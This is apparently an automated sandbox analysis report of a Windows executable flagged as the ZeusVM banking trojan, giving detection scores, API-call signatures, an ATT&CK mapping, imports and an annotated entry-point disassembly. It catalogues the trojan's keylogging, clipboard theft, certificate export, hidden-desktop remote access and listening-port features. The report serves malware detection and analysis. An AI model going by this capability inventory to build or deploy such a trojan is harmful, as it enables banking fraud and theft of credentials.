
Analysis Report K8nV75e45o

Overview

General Information

Sample Name: K8nV75e45o (renamed file extension from none to exe)
Analysis ID: 376941
MD5: b4bd8726c7a17ed5d3e99069a8e5872c
SHA1: 5f69352894ed9a03ad1aac338605e823802545ee
SHA256: fdaba3f0e49475409607ec915599d216ef30351eb34e6c52716a74921285c994
Tags: uncategorized

Detection

ZeusVM
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected ZeusVM e-Banking Trojan
Multi AV Scanner detection for submitted file
Contains VNC / remote desktop functionality (version string found)
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
May initialize a security null descriptor
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • K8nV75e45o.exe (PID: 3924 cmdline: 'C:\Users\user\Desktop\K8nV75e45o.exe' MD5: B4BD8726C7A17ED5D3E99069A8E5872C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: K8nV75e45o.exe  Avira: detected
Multi AV Scanner detection for submitted file
Source: K8nV75e45o.exe  Virustotal: Detection: 90%
Source: K8nV75e45o.exe  Metadefender: Detection: 89%
Source: K8nV75e45o.exe  ReversingLabs: Detection: 96%
Machine Learning detection for sample
Source: K8nV75e45o.exe  Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.K8nV75e45o.exe.400000.0.unpack  Avira: Label: TR/Kazy.MK
Source: 0.0.K8nV75e45o.exe.400000.0.unpack  Avira: Label: TR/Kazy.MK
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00412C9A  CryptUnprotectData, LocalFree
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_004176C6  CryptAcquireContextW, CryptCreateHash, CryptHashData, CryptGetHashParam, CryptDestroyHash, CryptReleaseContext
Source: K8nV75e45o.exe  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040EECB  GetFileAttributesExW, ReadProcessMemory, LoadLibraryW, GetProcAddress, SHGetFolderPathW, StrCmpNIW, FreeLibrary, NetUserEnum, NetUserGetInfo, NetApiBufferFree, NetApiBufferFree, SHGetFolderPathW
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041BA9D  FindFirstFileW, FindNextFileW, FindClose, SetFileAttributesW, RemoveDirectoryW
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041BB58  FindFirstFileW, Sleep, WaitForSingleObject, PathMatchSpecW, Sleep, Sleep, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041201E  InternetReadFileExA
Source: K8nV75e45o.exe  String found in binary or memory: http://www.google.com/webhp
Source: K8nV75e45o.exe  String found in binary or memory: http://www.google.com/webhpbc.exe-f
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_004098BE  NtCreateUserProcess, NtCreateThread, LdrLoadDll, GetFileAttributesExW, HttpSendRequestW, HttpSendRequestA, HttpSendRequestExW, HttpSendRequestExA, InternetCloseHandle, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpQueryInfoA, closesocket, send, WSASend, OpenInputDesktop, SwitchDesktop, DefWindowProcW, DefWindowProcA, DefDlgProcW, DefDlgProcA, DefFrameProcW, DefFrameProcA, DefMDIChildProcW, DefMDIChildProcA, CallWindowProcW, CallWindowProcA, RegisterClassW, RegisterClassA, RegisterClassExW, RegisterClassExA, BeginPaint, EndPaint, GetDCEx, GetDC, GetWindowDC, ReleaseDC, GetUpdateRect, GetUpdateRgn, GetMessagePos, GetCursorPos, SetCursorPos, SetCapture, ReleaseCapture, GetCapture, GetMessageW, GetMessageA, PeekMessageW, PeekMessageA, TranslateMessage, GetClipboardData, PFXImportCertStore
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041618F  EnterCriticalSection, GetTickCount, LeaveCriticalSection, GetKeyboardState, ToUnicode, TranslateMessage

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041D159  lstrcmpiA, lstrcmpiA, lstrcmpiA, CloseHandle
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00405A43  OpenWindowStationW, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CreateDesktopW, GetCurrentThreadId, GetThreadDesktop, SetThreadDesktop, CloseDesktop, CloseWindowStation
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_004098BE  NtCreateUserProcess, NtCreateThread, LdrLoadDll, GetFileAttributesExW, HttpSendRequestW, HttpSendRequestA, HttpSendRequestExW, HttpSendRequestExA, InternetCloseHandle, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpQueryInfoA, closesocket, send, WSASend, OpenInputDesktop, SwitchDesktop, DefWindowProcW, DefWindowProcA, DefDlgProcW, DefDlgProcA, DefFrameProcW, DefFrameProcA, DefMDIChildProcW, DefMDIChildProcA, CallWindowProcW, CallWindowProcA, RegisterClassW, RegisterClassA, RegisterClassExW, RegisterClassExA, BeginPaint, EndPaint, GetDCEx, GetDC, GetWindowDC, ReleaseDC, GetUpdateRect, GetUpdateRgn, GetMessagePos, GetCursorPos, SetCursorPos, SetCapture, ReleaseCapture, GetCapture, GetMessageW, GetMessageA, PeekMessageW, PeekMessageA, TranslateMessage, GetClipboardData, PFXImportCertStore
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00412245  NtQueryInformationProcess, CloseHandle, NtCreateThread
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_004122FC  NtCreateUserProcess, GetProcessId, GetThreadContext, SetThreadContext, VirtualFreeEx, CloseHandle
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00417D43  LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, CreateProcessAsUserW, CloseHandle, CloseHandle, CloseHandle, FreeLibrary
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040BA8F  InitiateSystemShutdownExW, ExitWindowsEx
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00406F85  CreateMutexW, GetLastError, CloseHandle, CloseHandle, ExitWindowsEx, OpenEventW, SetEvent, CloseHandle, CloseHandle, GetFileAttributesExW, ReadProcessMemory, GetFileAttributesExW, ReadProcessMemory, Sleep, IsWellKnownSid, GetFileAttributesExW, ReadProcessMemory, GetFileAttributesExW, VirtualFree, CreateEventW, WaitForSingleObject, WaitForMultipleObjects, CloseHandle, CloseHandle, CloseHandle, CloseHandle
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00419174
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_004175D2
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_004021F3
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040AE91
Source: K8nV75e45o.exe  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engine  Classification label: mal72.bank.troj.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040C0B2  CertOpenSystemStoreW, CertEnumCertificatesInStore, CertEnumCertificatesInStore, CertEnumCertificatesInStore, PFXExportCertStoreEx, PFXExportCertStoreEx, PFXExportCertStoreEx, CharLowerW, GetSystemTime, CertCloseStore
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040C227  CertOpenSystemStoreW, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertDeleteCertificateFromStore, CertEnumCertificatesInStore, CertCloseStore
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00417AED  GetCurrentThread, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, CloseHandle
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00417A96  CreateToolhelp32Snapshot, Thread32First, Thread32Next, CloseHandle
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041C8C2  CoCreateInstance, VariantInit, SysAllocString, VariantClear
Source: K8nV75e45o.exe  Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: K8nV75e45o.exe  Virustotal: Detection: 90%
Source: K8nV75e45o.exe  Metadefender: Detection: 89%
Source: K8nV75e45o.exe  ReversingLabs: Detection: 96%
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00418469  LoadLibraryA, GetProcAddress, FreeLibrary
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040247D  push es; iretd  (at 0_2_0040248C)
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00402B49  push cs; iretd  (at 0_2_00402B58)
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00402B13  push cs; ret  (at 0_2_00402B28)
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040F20F  LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadImageW, GetIconInfo, GetCursorPos, DrawIcon, lstrcmpiW, FreeLibrary, FreeLibrary, FreeLibrary, FreeLibrary
Source: all processes  Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041BA9D  FindFirstFileW, FindNextFileW, FindClose, SetFileAttributesW, RemoveDirectoryW
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041BB58  FindFirstFileW, Sleep, WaitForSingleObject, PathMatchSpecW, Sleep, Sleep, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00412425  LdrLoadDll, LdrGetDllHandle, LdrLoadDll, EnterCriticalSection, lstrcmpiW, LeaveCriticalSection
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00406015  mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040635A  GetModuleHandleW, GetModuleHandleW, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, HeapCreate, GetProcessHeap, InitializeCriticalSection, WSAStartup, CreateEventW, GetLengthSid, GetCurrentProcessId
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00419A10  InitializeSecurityDescriptor, SetSecurityDescriptorDacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, LocalFree
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040C056  GetUserNameExW
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0041654B  GetTimeZoneInformation
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_0040745C  GetVersionExW, GetNativeSystemInfo
Source: K8nV75e45o.exe  Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: K8nV75e45o.exe  String found in binary or memory: RFB 003.003
Source: K8nV75e45o.exe, 00000000.00000000.202422865.0000000000401000.00000020.00020000.sdmp  String found in binary or memory: $GetProcAddressLoadLibraryANtCreateThreadNtCreateUserProcessNtQueryInformationProcessRtlUserThreadStartLdrLoadDllLdrGetDllHandleSOFTWARE\Microsoft.dat0xB268B1AD#SysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXME-vnspr4.dllPR_OpenTCPSocketPR_ClosePR_ReadPR_WriteRFB 003.003
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00419841  socket, bind, closesocket
Source: C:\Users\user\Desktop\K8nV75e45o.exe  Code function: 0_2_00419563  socket, bind, listen, closesocket

Mitre Att&ck Matrix

Techniques with matched signatures, by tactic (the number in parentheses is the signature-count badge rendered next to the technique in the report; the remaining cells of the rendered matrix are the unmatched ATT&CK background and are not listed):

Initial Access: Valid Accounts (1)
Execution: Native API (1)
Persistence: Create Account (1); Valid Accounts (1); Application Shimming (1)
Privilege Escalation: Valid Accounts (1); Access Token Manipulation (11); Application Shimming (1)
Defense Evasion: Valid Accounts (1); Access Token Manipulation (11); Obfuscated Files or Information (1); Install Root Certificate (1); Software Packing (1)
Credential Access: Input Capture (11)
Discovery: Network Share Discovery (1); System Time Discovery (2); Security Software Discovery (1); Process Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (3)
Lateral Movement: Remote Desktop Protocol (1)
Collection: Input Capture (11); Archive Collected Data (1); Clipboard Data (1)
Exfiltration: none matched
Command and Control: Encrypted Channel (2); Remote Access Software (1); Ingress Tool Transfer (1)
Network Effects: none matched
Remote Service Effects: none matched
Impact: System Shutdown/Reboot (1)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source            Detection  Scanner         Label
K8nV75e45o.exe    90%        Virustotal
K8nV75e45o.exe    92%        Metadefender
K8nV75e45o.exe    97%        ReversingLabs   Win32.Trojan.Zeus
K8nV75e45o.exe    100%       Avira           TR/Kazy.MK
K8nV75e45o.exe    100%       Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source                                Detection  Scanner  Label
0.2.K8nV75e45o.exe.400000.0.unpack    100%       Avira    TR/Kazy.MK
0.0.K8nV75e45o.exe.400000.0.unpack    100%       Avira    TR/Kazy.MK

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 376941
Start date: 28.03.2021
Start time: 03:46:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 21s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: K8nV75e45o (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.bank.troj.winEXE@1/0@0/0
EGA Information: Failed
HDC Information:
  • Successful, ratio: 99.6% (good quality ratio 91.6%)
  • Quality average: 82.5%
  • Quality standard deviation: 30.1%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: MS-DOS executable
Entropy (8bit): 6.67054852527874
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • DOS Executable Borland Pascal 7.0x (2037/25) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • VXD Driver (31/22) 0.00%
File name: K8nV75e45o.exe
File size: 141824
MD5: b4bd8726c7a17ed5d3e99069a8e5872c
SHA1: 5f69352894ed9a03ad1aac338605e823802545ee
SHA256: fdaba3f0e49475409607ec915599d216ef30351eb34e6c52716a74921285c994
SHA512: cf1ca96b4913b62af6169183904446cfe568e357003873d0a58cc9363a6bde2d2ea538a7aa56d30674b25531803bf77ff3944ebea4a0e129e5c15bf4216fcf52
SSDEEP: 3072:nQuqviK2I7eGKyQCYxyoAIdA71BSFR5JD3AIP2+MDxIQeo:n9qKKFeG5oAPhBSFbJD3VPZQv
File Content Preview: MZ......................................................................................................................................................................................................................PE..L...u.KN.....................:.....

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x40728b
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x4E4B9075 [Wed Aug 17 09:57:09 2011 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 28e141e08402af84d2753cccce4d826e

Entrypoint Preview

Instruction (branch targets in this preview are rebased by the tool and are not meaningful as absolute addresses; comments on IAT slots are inferred from the argument pattern and the import table, not resolved by the report)
push ebp
mov ebp, esp
sub esp, 10h                          ; locals: flag bytes at [ebp-10h], [ebp-0Ch], [ebp-01h], argc at [ebp-08h]
push ebx
push 00000000h
xor bl, bl                            ; bl is a fourth flag, cleared
call 00007F1014DEF594h
test al, al
je 00007F1014DF05AAh                  ; bail out if the init routine fails
push 00008007h                        ; 0x8007 = SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOALIGNMENTFAULTEXCEPT | SEM_NOOPENFILEERRORBOX
mov byte ptr [ebp-10h], bl            ; defaults: [ebp-10h] = 0, [ebp-0Ch] = 1, [ebp-01h] = 0
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [0040126Ch]            ; IAT slot; the 0x8007 argument matches SetErrorMode (imported): suppress error dialogs
lea eax, dword ptr [ebp-08h]
push eax                              ; &argc
call dword ptr [00401270h]            ; IAT slot; no-argument call whose result is passed on, consistent with GetCommandLineW (imported)
push eax                              ; command line
call dword ptr [004012C4h]            ; IAT slot; (lpCmdLine, &argc) matches CommandLineToArgvW (imported); eax = argv
test eax, eax
je 00007F1014DF0557h
xor edx, edx                          ; edx = argument index
cmp dword ptr [ebp-08h], edx
jle 00007F1014DF0511h                 ; skip the loop when argc <= 0
mov ecx, dword ptr [eax+edx*4]        ; ecx = argv[edx] (wide string)
test ecx, ecx
je 00007F1014DF0504h
cmp word ptr [ecx], 002Dh             ; first character '-'?
jne 00007F1014DF04FEh
movzx ecx, word ptr [ecx+02h]         ; second character selects the switch
cmp ecx, 66h                          ; 'f'
je 00007F1014DF04F1h
cmp ecx, 69h                          ; 'i'
je 00007F1014DF04E8h
cmp ecx, 6Eh                          ; 'n'
je 00007F1014DF04DDh
cmp ecx, 76h                          ; 'v'
jne 00007F1014DF04E6h
mov byte ptr [ebp-01h], 00000001h     ; each of the four handlers below sets or clears one flag
jmp 00007F1014DF04E0h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007F1014DF04DAh
mov bl, 01h
jmp 00007F1014DF04D6h
mov byte ptr [ebp-10h], 00000001h
inc edx                               ; next argument
cmp edx, dword ptr [ebp-08h]
jl 00007F1014DF0493h                  ; loop while edx < argc
push eax
call dword ptr [00401230h]            ; IAT slot; argv is released here, matching LocalFree (imported), the documented cleanup for CommandLineToArgvW
test bl, bl                           ; the bl-flagged switch takes its own path
je 00007F1014DF04D9h
call 00007F1014DEFF45h
jmp 00007F1014DF0506h
cmp byte ptr [ebp-01h], 00000000h
je 00007F1014DF04F5h
call 00007F1014DF1631h
call 00007F1014DF25F9h
test byte ptr [00422940h], 00000004h  ; global flags byte at 0x422940 (the same byte E0040635A below zeroes when bit 0 of its argument is clear)
mov bl, al
je 00007F1014DF04EDh
push 00000000h
mov eax, 00422E10h
call 00007F1014DF148Eh
jmp 00007F1014DF04DFh

Data Directories

Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0x1f784          0x118         .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC        0x25000          0x11ac        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x1000           0x5a0         .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x20664       0x20800   False     0.641323617788   data       6.69796313177  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data   0x22000          0x2054        0x400     False     0.208984375      data       1.60912793454  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x25000          0x166a        0x1800    False     0.6220703125     data       5.63175186351  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL: imports
KERNEL32.dll: CreateThread, GetLastError, GetThreadContext, SetThreadContext, VirtualAlloc, GetProcessId, GlobalLock, GlobalUnlock, GetEnvironmentVariableW, FileTimeToDosDateTime, GetTempFileNameW, HeapReAlloc, FindFirstFileW, SetEndOfFile, CreateProcessW, HeapAlloc, SystemTimeToFileTime, SetFilePointerEx, HeapFree, GetProcessHeap, IsBadReadPtr, SetFileTime, VirtualQueryEx, OpenProcess, Thread32First, WideCharToMultiByte, ReadProcessMemory, CreateFileMappingW, HeapDestroy, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, GetTempPathW, GetFileSizeEx, OpenMutexW, VirtualProtectEx, VirtualAllocEx, FindClose, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, CreateRemoteThread, Process32FirstW, Process32NextW, SetThreadPriority, GetCurrentThread, GetLocalTime, LoadLibraryA, SetFileAttributesW, WTSGetActiveConsoleSessionId, lstrcmpiA, LoadLibraryW, CreateDirectoryW, FreeLibrary, EnterCriticalSection, UnmapViewOfFile, MapViewOfFile, GetPrivateProfileIntW, FlushFileBuffers, CreateFileW, LeaveCriticalSection, InitializeCriticalSection, WriteFile, GetPrivateProfileStringW, GetSystemTime, ExpandEnvironmentStringsW, ResetEvent, TerminateProcess, TlsSetValue, TlsGetValue, TlsFree, HeapCreate, TlsAlloc, CreateMutexW, ReleaseMutex, SetLastError, GetNativeSystemInfo, WriteProcessMemory, LocalFree, GetCurrentProcessId, CloseHandle, DuplicateHandle, OpenEventW, GetFileAttributesExW, WaitForMultipleObjects, CreateEventW, GetProcAddress, GetVersionExW, VirtualFreeEx, VirtualFree, GetModuleHandleW, SetEvent, GetComputerNameW, SetErrorMode, GetCommandLineW, ExitProcess, GetCurrentThreadId, GetUserDefaultUILanguage, lstrcmpiW, GetModuleFileNameW, GetFileAttributesW, Sleep, GetTickCount, WaitForSingleObject, MoveFileExW
USER32.dll: GetMenu, RegisterClassExW, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, ReleaseDC, GetMenuState, DefWindowProcA, DefMDIChildProcW, SwitchDesktop, GetMenuItemCount, DefDlgProcA, PostThreadMessageW, DefMDIChildProcA, HiliteMenuItem, RegisterClassW, GetDC, EndMenu, CallWindowProcW, DefWindowProcW, DefFrameProcW, RegisterClassA, GetShellWindow, GetMessageA, GetWindowDC, GetMessageW, SetCapture, PostMessageW, GetParent, GetWindowInfo, CharLowerBuffA, GetUpdateRgn, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, CharLowerA, CharUpperW, SetWindowLongW, GetWindow, DispatchMessageW, GetKeyboardState, ToUnicode, MapVirtualKeyW, DrawIcon, GetIconInfo, CharToOemW, CharLowerW, GetSystemMetrics, TranslateMessage, GetClipboardData, FillRect, DrawEdge, OpenInputDesktop, BeginPaint, EndPaint, CallWindowProcA, GetUpdateRect, MenuItemFromPoint, GetDCEx, EqualRect, OpenWindowStationW, GetUserObjectInformationW, PrintWindow, RegisterClassExA, RegisterWindowMessageW, GetMenuItemID, GetClassLongW, GetCapture, SetCursorPos, GetWindowLongW, GetAncestor, PeekMessageW, PeekMessageA, SetWindowPos, GetCursorPos, SendMessageTimeoutW, IsWindow, ReleaseCapture, SendMessageW, MapWindowPoints, GetMessagePos, GetWindowThreadProcessId, IsRectEmpty, ExitWindowsEx, SetKeyboardState, GetSubMenu, DefDlgProcW, DefFrameProcA, GetWindowRect, SetThreadDesktop, CloseDesktop, OpenDesktopW, GetProcessWindowStation, CreateWindowStationW, CloseWindowStation, GetThreadDesktop, SetProcessWindowStation, CreateDesktopW, IntersectRect
ADVAPI32.dll: IsWellKnownSid, GetLengthSid, ConvertSidToStringSidW, InitiateSystemShutdownExW, EqualSid, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegSetValueExW, CryptHashData
SHLWAPI.dll: PathIsURLW, PathRenameExtensionW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathFindFileNameW, PathIsDirectoryW, wvnsprintfW, UrlUnescapeA, PathQuoteSpacesW, StrStrIW, StrStrIA, StrCmpNIW, PathRemoveBackslashW, PathRemoveFileSpecW
SHELL32.dll: CommandLineToArgvW, SHGetFolderPathW, ShellExecuteW
Secur32.dll: GetUserNameExW
ole32.dll: StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll: SetViewportOrgEx, GdiFlush, CreateDIBSection, SetRectRgn, SaveDC, RestoreDC, DeleteDC, GetDeviceCaps, DeleteObject, SelectObject, GetDIBits, CreateCompatibleBitmap, CreateCompatibleDC
WS2_32.dll: recv, sendto, getsockname, select, getaddrinfo, recvfrom, getpeername, accept, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, shutdown, setsockopt, bind, socket, WSASetLastError, listen, freeaddrinfo, WSAGetLastError, WSASend, closesocket, send
CRYPT32.dll: PFXExportCertStoreEx, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, PFXImportCertStore, CryptUnprotectData
WININET.dll: InternetQueryOptionA, InternetSetOptionA, InternetQueryOptionW, HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, InternetOpenA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetCrackUrlA, InternetConnectA, HttpSendRequestA, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpQueryInfoA, HttpSendRequestExA, InternetCloseHandle
OLEAUT32.dll: VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll: NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found


System Behavior

General

Start time: 03:47:07
Start date: 28/03/2021
Path: C:\Users\user\Desktop\K8nV75e45o.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\K8nV75e45o.exe'
Imagebase: 0x400000
File size: 141824 bytes
MD5 hash: B4BD8726C7A17ED5D3E99069A8E5872C
Has elevated privileges: true
